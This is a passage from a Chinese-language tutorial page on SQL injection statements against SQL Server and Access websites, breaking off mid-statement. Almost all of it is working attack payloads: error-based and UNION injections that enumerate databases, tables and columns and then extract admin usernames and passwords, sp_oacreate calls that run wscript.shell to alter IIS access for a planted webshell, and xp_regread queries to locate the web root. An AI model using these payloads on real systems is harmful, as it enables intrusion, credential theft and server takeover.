当前位置:Gxlcms > mysql > 常用SQL注射语句解析(2)_MySQL

常用SQL注射语句解析(2)_MySQL

时间:2021-07-01 10:21:17 帮助过:24人阅读

bitsCN.com

w "默认Web站点"

  -v "e","e:/"'--

  访问属性:(配合写入一个webshell)

  declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod

  @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a

  w3svc/1/ROOT/e +browse'

  爆库 特殊技巧::%5c='/' 或者把/和/ 修改%5提交

  如何得到SQLSERVER某个数据库中所有表的表名?

  --------------------------------------------------------------------------------

  用户表:

  select name from sysobjects where xtype = 'U';

  系统表:

  select name from sysobjects where xtype = 'S';

  所有表:

  select name from sysobjects where xtype = 'S' or xtype = 'U';

  --------------------------------------------------------------------------------

  and 0<>(select top 1 paths from newtable)--

  得到库名(从1到5都是系统的id,6以上才可以判断)

  and 1=(select name from master.dbo.sysdatabases where dbid=7)--

  and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and

  dbid=6)

  依次提交 dbid = 7,8,9.... 得到更多的数据库名

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表

  假设为 admin

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

  not in ('Admin')) 来得到其他的表。

  and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and

  name='admin'

  and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id

  and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)

  得到一个admin的一个字段,假设为 user_id

  and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and

  name not in

  ('id',...)) 来暴出其他的字段

  and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名

  依次可以得到密码。。。。。假设存在user_id username ,password 等字段

  and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and

  dbid=6)

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

  not in('Address'))

  and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and

  name='admin' and uid>(str(id))) 判断id值

  and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

  ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

  ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

  (union,access也好用)
   得到WEB路径
  ;create table [dbo].[swap] ([swappass][char](255));--

  and (select top 1 swappass from swap)=1--

  ;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare

  @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',

  @key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/',

  @value_name='/', values=@test OUTPUT insert into p

bitsCN.com

人气教程排行